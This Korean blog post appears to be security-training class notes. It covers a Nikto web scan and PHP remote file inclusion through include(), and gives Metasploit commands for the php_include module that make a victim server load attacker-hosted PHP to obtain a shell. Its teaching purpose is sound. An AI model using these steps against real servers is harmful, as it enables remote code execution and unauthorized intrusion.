/pentest/web/nikto/nikto.pl -h [서버주소] -p [포트]
Ex) /pentest/web/nikto.pl -h 192.168.7.136 -p 80
php include 취약점
php의 include() 함수는 지정경로의 파일을 포함한다.
만약 php소스가
include("/etc/passwd")
일 경우, /etc/passwd 의 내용을 참조한다
또한 이것은 꼭 파일의 경로에 한정된 것이 아닌, URL도 포함된다.
따라서 내 포트중 하나에 악의적인 PHP소스를 넣고 열어두어 희생자 PC에 내 소스를 참조하게 한다면,
공격은 성공한다.
use exploit/unix/webapp/php_include
set PHPURL [URL]/?hacker=www.naver.com
--> naver.com 을 참조. --> 네이버가 뜸
이런식으로, php_include 취약점을 활용하여 쉘을 얻을 수 있음.
'외부 교육 정리 > 서울여대 정보보호 영재교육원' 카테고리의 다른 글
| 14.9 ~ 15.1 모두 수고하셨습니다. (0) | 2015.01.17 |
|---|---|
| 메타스플로잇 익스플로잇 추가 방법(raon00) (0) | 2015.01.16 |
| [모의해킹] 자동 백도어 설치 (0) | 2015.01.16 |
| [모의해킹] 타겟PC 에 Backdoor 설치 (0) | 2015.01.15 |
| 모의해킹 - Heap Overflow 를 이용한 Exploit (0) | 2015.01.15 |